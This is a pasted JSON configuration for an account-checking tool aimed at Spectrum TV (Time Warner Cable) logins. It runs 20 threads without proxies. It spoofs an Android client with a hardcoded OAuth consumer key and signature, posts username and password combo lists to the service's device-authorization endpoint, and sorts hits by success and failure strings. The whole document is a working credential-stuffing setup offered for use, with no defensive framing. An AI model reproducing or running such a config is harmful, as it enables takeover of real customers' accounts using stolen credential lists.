· 7 years ago · Mar 30, 2018, 09:38 PM
1{
2 "General": {
3 "name": "Spectrum TV",
4 "proxyType": "Proxyless",
5 "comboType": "Username",
6 "threads": 20
7 },
8 "Requests": [
9 {
10 "actionUrl": "https://services.timewarnercable.com/auth/oauth/request",
11 "method": "POST",
12 "userAgent": "Dalvik/1.6.0",
13 "contentType": "application/x-www-form-urlencoded",
14 "headers": [
15 {
16 "name": "Authorization",
17 "value": "OAuth oauth_callback=\"oob\", oauth_consumer_key=\"fdc89e99-8925-44d2-b2ac-7054d1f8193d\", oauth_nonce=\"4504541523026453261\", oauth_signature=\"rvTVZp4UymdGCnR9LHqYA5kEra4%3D\", oauth_signature_method=\"HMAC-SHA1\", oauth_timestamp=\"1518002685\", oauth_version=\"1.0\""
18 }
19 ],
20 "successKeys": [
21 "confirmed=true"
22 ],
23 "variables": [
24 {
25 "name": "oauth",
26 "type": "Regex",
27 "pattern": "oauth_token=([^&]*)",
28 "usedFor": "postData"
29 }
30 ]
31 },
32 {
33 "actionUrl": "https://services.timewarnercable.com/auth/oauth/device/authorize",
34 "method": "POST",
35 "userAgent": "Dalvik/1.6.0",
36 "contentType": "application/x-www-form-urlencoded",
37 "postData": "oauth_token=+oauth|1+&xoauth_device_type=Android+TWC+TV&xoauth_device_id=faplulz5-40e5-437e-ad23-671b767d6969&username=<USER>&password=<PASS>",
38 "successKeys": [
39 "xoauth_account_type"
40 ],
41 "failureKeys": [
42 "account not active"
43 ]
44 }
45 ]
46}